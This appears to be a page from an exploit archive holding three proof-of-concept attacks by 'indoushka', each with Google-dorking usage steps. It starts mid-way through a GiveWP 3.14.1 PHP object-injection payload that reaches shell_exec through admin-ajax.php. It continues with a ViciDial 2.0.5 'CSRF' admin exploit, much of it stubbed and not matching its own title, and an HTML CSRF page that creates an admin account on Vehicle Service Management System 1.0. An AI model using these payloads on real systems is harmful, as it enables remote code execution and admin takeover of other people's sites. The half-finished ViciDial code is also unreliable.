'O:19:"Stripe\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";O:62:"Give\\\\PaymentGateways\\\\DataTransferObjects\\\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";O:33:"Give\\\\Vendors\\\\Faker\\\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\\0*\\0generator";O:34:"Give\\\\Onboarding\\\\SettingsRepository":1:{s:11:"\\0*\\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',            strlen($remoteFileUrl),            $remoteFileUrl        );        $data = array(            'give-form-id' => $validForm['give_form_id'],            'give-form-hash' => $validForm['give_form_hash'],            'give-price-id' => $validForm['give_price_id'],            'give-amount' => $validForm['give_amount'],            'give_first' => 'Test',            'give_last' => 'User',            'give_email' => 'test@example.com',            'give_title' => $payload,            'give-gateway' => 'offline',            'action' => 'give_process_donation'        );        $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);    }    private function sendRequest($method, $url, $data) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers),                'content' => http_build_query($data)            )        );        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        if ($result === false) {            return false;        }        return array(            'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code            'body' => $result        );    }}// Usage$exploit = new GiveWPExploit('http://127.0.0.1');$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

WordPress GiveWP Donation Fundraising Platform 3.14.1 Code Injection

ViciDial version 2.0.5 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : ViciDial Call Center - astguiclient - thirtieth public release 2.0.5 CSRF Add ADmin Vulnerability                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://github.com/inktel/Vicidial/archive/refs/heads/master.zip                                                            |=============================================================================================================================================POC :[+] Dorking İn Google Or Other Search Enggine.[+] The following php code add new admin .[+] Line 172 set your target. ( $exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1'); )[+] save code as poc.php .[+] USage : cmd = php poc.php .[+] PayLoad :<?phpclass VICIdialExploit {    private $username;    private $password;    private $targetUri;    private $headers;    public function __construct($username, $password, $targetUri) {        $this->username = $username;        $this->password = $password;        $this->targetUri = $targetUri;        $this->headers = array(            'Authorization' => 'Basic ' . base64_encode($username . ':' . $password)        );    }    public function check() {        $response = $this->sendRequest('GET', $this->targetUri . '/agc/vicidial.php');        if ($response['code'] != 200) {            return 'Unknown';        }        $version_info = $this->extractVersion($response['body']);        if (!$version_info) {            return 'Unknown';        }        $current_version = $this->compareVersion($version_info, '2.14-917a');        return ($current_version <= 0) ? 'Vulnerable' : 'Safe';    }    private function extractVersion($html) {        preg_match("/VERSION:\s*(\d+\.\d+)-(\d+)/", $html, $matches);        return isset($matches[0]) ? $matches[0] : null;    }    private function compareVersion($current, $vulnerable) {        return version_compare($current, $vulnerable);    }    public function exploit() {        $this->startService();        $this->authenticateAdmin();        $this->updateUserSettings();        $this->updateSystemSettings();        $campaignData = $this->createDummyCampaign();        $this->updateCampaignSettings($campaignData['id']);        $this->createDummyList($campaignData['list_name'], $campaignData['id']);        $phoneCreds = $this->fetchPhoneCredentials();        $this->agentPortalAuthentication($phoneCreds['extension'], $phoneCreds['password'], $campaignData['id']);        $this->insertMaliciousRecording($phoneCreds['recording_extension']);        $this->deleteDummyCampaign($campaignData['id']);        $this->waitForCronJob();    }    private function startService() {        // Starting HTTP service logic    }    private function sendRequest($method, $url, $body = null) {        $options = array(            'http' => array(                'method' => $method,                'header' => implode("\r\n", $this->headers)            )        );        if ($body) {            $options['http']['content'] = http_build_query($body);        }        $context = stream_context_create($options);        $result = file_get_contents($url, false, $context);        return array(            'code' => $http_response_header[0],            'body' => $result        );    }    private function authenticateAdmin() {        $response = $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '3', 'user' => $this->username));        if ($response['code'] != 200) {            throw new Exception('Failed to authenticate with credentials.');        }        echo 'Authenticated successfully as user ' . $this->username;    }    private function updateUserSettings() {        $faker = new Faker\Generator();        $userSettings = array(            'ADD' => '4A',            'user' => $this->username,            'pass' => $this->password,            'full_name' => $faker->name,            'user_group' => 'ADMIN',            'phone_login' => $faker->userName,            'phone_pass' => $faker->password,            'active' => 'Y',            'vicidial_recording' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $userSettings);        echo 'Updated user settings';    }    private function updateSystemSettings() {        // Fetching system settings logic and making changes    }    private function createDummyCampaign() {        $faker = new Faker\Generator();        $campaignId = rand(100000, 999999);        $listId = $campaignId + 1;        $campaignName = $faker->company;        $campaignSettings = array(            'ADD' => '21',            'campaign_id' => $campaignId,            'campaign_name' => $campaignName,            'user_group' => '---ALL---',            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Created dummy campaign ' . $campaignName;        return array('name' => $campaignName, 'id' => $campaignId, 'list_name' => $campaignName . ' List', 'list_id' => $listId);    }    private function updateCampaignSettings($campaignId) {        $campaignSettings = array(            'ADD' => '41',            'campaign_id' => $campaignId,            'active' => 'Y',            'auto_dial_level' => '1'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $campaignSettings);        echo 'Updated dummy campaign settings';    }    private function createDummyList($listName, $campaignId) {        $listSettings = array(            'ADD' => '211',            'list_name' => $listName,            'campaign_id' => $campaignId,            'active' => 'Y'        );        $this->sendRequest('POST', $this->targetUri . '/vicidial/admin.php', $listSettings);        echo 'Created dummy list ' . $listName;    }    private function fetchPhoneCredentials() {        // Fetching phone credentials logic    }    private function agentPortalAuthentication($extension, $password, $campaignId) {        // Agent portal authentication logic    }    private function insertMaliciousRecording($recordingExtension) {        // Inserting malicious recording logic    }    private function deleteDummyCampaign($campaignId) {        $this->sendRequest('GET', $this->targetUri . '/vicidial/admin.php', array('ADD' => '61', 'campaign_id' => $campaignId, 'CoNfIrM' => 'YES'));        echo 'Deleted dummy campaign ' . $campaignId;    }    private function waitForCronJob() {        // Waiting for cron job logic    }}// Usage example:$exploit = new VICIdialExploit('admin', 'password', 'http://127.0.0.1');$exploit->check();$exploit->exploit();?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

ViciDial 2.0.5 Cross Site Request Forgery

Vehicle Service Management System version 1.0 suffers from a cross site request forgery vulnerability.

    =============================================================================================================================================| # Title     : Vehicle Service Management System 1.0 CSRF Add Admin Vulnerability                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.kashipara.com/project/php/10641/online-vehicle-service-management-system                                        |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload inject new admin account.[+] Line 6 Set your Target.[+] Line 15+19 Set your user & pass.[+] save payload as poc.html[+] payload :<!DOCTYPE html> <html> <body> <script> function submitRequest()  { var xhr = new XMLHttpRequest();  xhr.open("POST", "http://localhost/vservice/classes/Users.php?f=save", true); xhr.setRequestHeader("Accept", "*\/*");  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5"); xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------"); xhr.withCredentials = true;  var body = "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"username\"\r\n" +  "\r\n" +  "indoushka\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"password\"\r\n" +  "\r\n" +  "Hacked\r\n" +  "-----------------------------\r\n" +  "Content-Disposition: form-data; name=\"type\"\r\n" +  "\r\n" +  "1\r\n" +  "-------------------------------\r\n";  var aBody = new Uint8Array(body.length);  for (var i = 0; i < aBody.length; i++)  aBody[i] = body.charCodeAt(i);  xhr.send(new Blob([aBody]));  } </script> <form action="#"> <input type="button" value="Submit request" onclick="submitRequest();" /> </form>  </body>  </html>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#google